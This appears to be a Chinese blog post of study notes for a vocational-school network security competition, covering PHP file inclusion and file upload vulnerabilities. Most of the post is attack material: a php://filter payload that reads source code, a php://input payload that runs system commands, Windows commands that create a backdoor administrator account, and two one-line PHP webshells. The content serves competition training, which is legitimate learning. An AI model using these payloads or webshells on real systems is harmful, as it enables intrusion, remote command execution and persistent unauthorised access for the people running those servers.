当前位置: 首页 > news >正文

全国职业院校技能大赛中职组网络安全竞赛试题 —文件包含漏洞与文件上传漏洞 (笔记文档)

全国职业院校技能大赛中职组网络安全竞赛试题 —文件包含漏洞与文件上传漏洞 (笔记文档)

中职网安 文件包含漏洞与文件上传漏洞 笔记

文件包含漏洞与文件上传漏洞


1.利用条件:allow_url_include = On


2.文件包含漏洞,?file=php://filter/read=convert.base64-encode/resource=index.php  可查看index.php文件的代码


3.文件包含漏洞,?file=php://input  再提交post数据 <?php system("ipconfig")?>  可执行系统cmd命令并查看


cmd部分提权常用命令:
whoami  查看当前用户
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net user            查看所有用户列表
net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz
net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员
文件上传:
php一句话木马<?php eval($_POST[hucys]);?> 
cmd命令执行  <?php $rel = system($_GET['cmd']); echo $rel; ?>

有问题可以私信博主哈~~~~~

觉得有对你有帮助话给个一键三连(您的鼓励是我的动力)

祝大家身体健康万事如意!!!

相关文章:

  • java学习day64(乐友商城)Elasticsearch
  • Fabric.js 保存自定义属性
  • 【软件测试】测试人的懊恼,你要揭开的秘密复现bug......
  • 嵌入式C语言面向对象编程 --- 封装
  • 第十九章 webpack5项目搭建Vue-Cli(合并配置)
  • 设计好接口的36个锦囊
  • 我以为自己MySQL够牛逼了,直到看到了Alibaba的面试题
  • 解决vue代码不规范而出现的问题:Eslint修复
  • 2022年全国职业院校技能大赛中职组网络安全竞赛试题B模块 —辽宁省wirehark数据分析与取证hacker.pcapng数据包(flag)
  • 解决PageHelper版本不匹配,结果可能全部返回问题
  • 经验:工具在接口测试中发挥什么样的作用?
  • 2021年中职组“网络安全”赛项合肥市竞赛任务书
  • 会计毕业生的转行之路:坚持无畏,我是我自己的英雄
  • Codeforces Round #699 (Div. 2) C. Fence Painting
  • Python OpenCV识别行人入口进出人数统计
  • 青岛软件企业认定的条件及程序
  • 2021遥感应用组二等奖:基于长时序Landsat遥感影像的赣南脐橙时空变化分析
  • 十四、Docker 微服务实战
  • StarRocks Join Reorder 源码解析
  • 活动星投票唱响泉城网络评选投票在线投票小程序如何挑选投票平台